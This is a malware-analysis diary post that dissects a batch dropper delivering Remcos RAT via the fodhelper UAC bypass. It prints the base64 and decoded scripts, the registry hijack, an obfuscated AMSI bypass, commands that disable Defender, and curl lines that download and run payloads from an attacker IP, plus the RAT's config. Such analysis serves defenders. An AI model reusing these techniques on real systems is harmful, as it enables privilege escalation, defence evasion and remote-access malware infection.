My next class:
Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 28th - Nov 1st 2024

RAT Delivered Through FODHelper

Published: 2022-09-22. Last Updated: 2022-09-22 07:11:21 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

I found a simple batch file that drops a Remcos[1] RAT through an old UAC Bypass technique. This technique is based on the "fodhelper" utility ("Features On Demand Helper"). Once launched, this tool will search for specific registry keys and, if present, will execute their content with high privileges.

The script, called "2.bat", is very simple. Note that opened into a text editor, it will display Chinese characters due to the BOM (Byte Order Mark):

remnux@remnux:/MalwareZoo/20220919$ xxd 2.bat 
00000000: fffe 2663 6c73 0d0a 4065 6368 6f20 6f66  ..&cls..@echo of
00000010: 6620 0d0a 5469 746c 6520 257e 6e30 0d0a  f ..Title %~n0..
00000020: 4d6f 6465 2036 302c 3320 0d0a 636f 6c6f  Mode 60,3 ..colo
00000030: 7220 3042 0d0a 6563 686f 280d 0a65 6368  r 0B..echo(..ech
00000040: 6f20 2020 2020 2020 2020 506c 6561 7365  o         Please
00000050: 2077 6169 742e 2e2e 2061 2077 6869 6c65   wait... a while
00000060: 204c 6f61 6469 6e67 2064 6174 6120 2e2e   Loading data ..
00000070: 2e2e 0d0a 4345 5254 5554 494c 202d 6620  ....CERTUTIL -f 

Here is the decoded script:

cls
@echo off 
Title %~n0
Mode 60,3 
color 0B
echo(
echo         Please wait... a while Loading data ....
CERTUTIL -f -decode "%~f0" "%Temp%\2.bat" >nul 2>&1 
cls
"%Temp%\2.bat"
Exit
-----BEGIN CERTIFICATE-----
QGVjaG8gb2ZmDQplY2hvIFBsZWFzZSB3YWl0IDMwIHNlY29uZHM6IHdlJ3JlIGJ5
cGFzc2luZyB0aGUgQXV0aElEKEhXSUQpLiBUaGlzIHRyYXkgd2lsbCBhdXRvY2xv
c2Ugb25jZSBmaW5pc2hlZC4NCmN1cmwuZXhlIC1zIC0tb3V0cHV0ICVVU0VSUFJP
RklMRSVcTGlua3NccHVlZG8ucHMxIC0tdXJsIGh0dHA6Ly8xNzEuMjIuMzAuMTIw
L3B1ZWRvLnBzMQ0KdGltZW91dCA1ID4gbnVsDQpjdXJsLmV4ZSAtcyAtLW91dHB1
dCAlVVNFUlBST0ZJTEUlXExpbmtzXGFkaGQuYmF0IC0tdXJsIGh0dHA6Ly8xNzEu
MjIuMzAuMTIwL2FkaGQuYmF0DQp0aW1lb3V0IDUgPiBudWwNCmN1cmwuZXhlIC1z
IC0tb3V0cHV0ICVVU0VSUFJPRklMRSVcTGlua3NcbmV0LnZicyAtLXVybCBodHRw
Oi8vMTcxLjIyLjMwLjEyMC9uZXQudmJzDQp0aW1lb3V0IDUgPiBudWwNCnBvd2Vy
c2hlbGwgTmV3LUl0ZW0gLVBhdGggSEtDVTpcU29mdHdhcmVcQ2xhc3Nlc1xtcy1z
ZXR0aW5nc1xzaGVsbFxvcGVuXGNvbW1hbmQgLVZhbHVlICVVU0VSUFJPRklMRSVc
TGlua3NcYWRoZC5iYXQgLUZvcmNlDQpwb3dlcnNoZWxsIE5ldy1JdGVtUHJvcGVy
dHkgLVBhdGggSEtDVTpcU29mdHdhcmVcQ2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVs
bFxvcGVuXGNvbW1hbmQgLU5hbWUgRGVsZWdhdGVFeGVjdXRlIC1Qcm9wZXJ0eVR5
cGUgU3RyaW5nIC1Gb3JjZQ0KZm9kaGVscGVyDQpleGl0DQpEZWwgJX4wIA0KDQpE
ZWwgJX4wIA0K
-----END CERTIFICATE-----

certutil.exe (a common LOLbin) is used to decode the Base64 data present in the file, dump a new bat file and launch it. This is performed thanks to the "%~f0" which returns the full path of the batch file itself. Here is the bat file:

@echo off
echo Please wait 30 seconds: we're bypassing the AuthID(HWID). This tray will autoclose once finished.
curl.exe -s --output %USERPROFILE%\Links\puedo.ps1 --url hxxp://171[.]22[.]30[.]120/puedo.ps1
timeout 5 > nul
curl.exe -s --output %USERPROFILE%\Links\adhd.bat --url hxxp://171[.]22[.]30[.]120/adhd.bat
timeout 5 > nul
curl.exe -s --output %USERPROFILE%\Links\net.vbs --url hxxp://171[.]22[.]30[.]120/net.vbs
timeout 5 > nul
powershell New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value %USERPROFILE%\Links\adhd.bat -Force
powershell New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
fodhelper
exit
Del %~0 

Once fodhelper is launched, it will execute adhd.bat, which uses the same technique:

cls
@echo off
Title %~n0
Mode 60,3
color 0B
echo(
echo         Please wait... a while Loading data ....
CERTUTIL -f -decode "%~f0" "%Temp%\adhd - Copia.bat" >nul 2>&1
cls
"%Temp%\adhd - Copia.bat"
Exit
-----BEGIN CERTIFICATE-----
QGVjaG8gb2ZmDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu
cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCmNkICVVU0VSUFJPRklMRSVcTGlu
a3NcDQpQb3dlclNoZWxsIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1GaWxlICJw
dWVkby5wczEiDQplY2hvIEFsbW9zdCBmaW5pc2hlZDogaXQgd2lsbCBhdXRvcnVu
cyBpbiBsZXNzIHRoYW4gMTUgc2Vjb25kcyENCnRpbWVvdXQgMTAgPiBudWwNCnN0
YXJ0IG5ldC52YnMNCmV4aXQNCg0KDQpEZWwgJX4wIA0KDQpEZWwgJX4wIA0K
-----END CERTIFICATE-----

The decoded Base64 contains:

@echo off
echo Almost finished: it will autoruns in less than 15 seconds!
cd %USERPROFILE%\Links\
PowerShell -ExecutionPolicy Bypass -File "puedo.ps1"
echo Almost finished: it will autoruns in less than 15 seconds!
timeout 10 > nul
start net.vbs
exit
Del %~0 

The Powershell script "puedo.ps1" is responsible for downloading and executing the malware:

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
Set-MpPreference -DisableRealtimeMonitoring $trUE
Set-MpPreference -DisableIOAVProtection $trUE
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:"
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\"
curl.exe -s --output ("photoscreen\$env:USERNAME\Links\Zu@E.jpeg".Replace('photo','C:\').Replace('screen','Users\').Replace('Zu@E','\zoey').Replace('jpeg','exe')) --url ("colibri://google/Papero.exe".Replace('colibri','http').Replace('google','171[.]22[.]30[.]120'))
cd C:\Users\$env:USERNAME\Links
.\zoey.exe
exit

Note that the script tries to disable AMSI and Microsoft Defender. The malware is a Remcos RAT (SHA256:6e83574ed73d798183a1555a910dcc118ac05cf1eac77306ab6edfdcab9207c3) with the following config:

{
    "c2": [
        "171[.]22[.]30[.]7:5578"
    ],
    "attr": {
        "mutex": "asf4fas8sf48asf84as4f89huhhu99h9h-V446WS",
        "copy_file": "Isass.exe",
        "hide_file": false,
        "copy_folder": "Microsoft Updater",
        "delete_file": false,
        "keylog_file": "logs.dat",
        "keylog_flag": false,
        "audio_folder": "MicRecords",
        "install_flag": true,
        "install_path": "%ProgramFiles%",
        "keylog_crypt": false,
        "mouse_option": false,
        "connect_delay": "0",
        "keylog_folder": "remcos",
        "startup_value": "Windows Host Controller",
        "screenshot_flag": false,
        "screenshot_path": "%AppData%",
        "screenshot_time": "10",
        "connect_interval": "1",
        "hide_keylog_file": false,
        "screenshot_crypt": false,
        "audio_record_time": "5",
        "screenshot_folder": "Screenshots",
        "take_screenshot_time": "5",
        "take_screenshot_option": false
    },
    "rule": "Remcos",
    "botnet": "Papero",
    "family": "remcos"
}

[1] https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

0 comment(s)
My next class:
Reverse-Engineering Malware: Advanced Code AnalysisOnline | Greenwich Mean TimeOct 28th - Nov 1st 2024

Comments


Diary Archives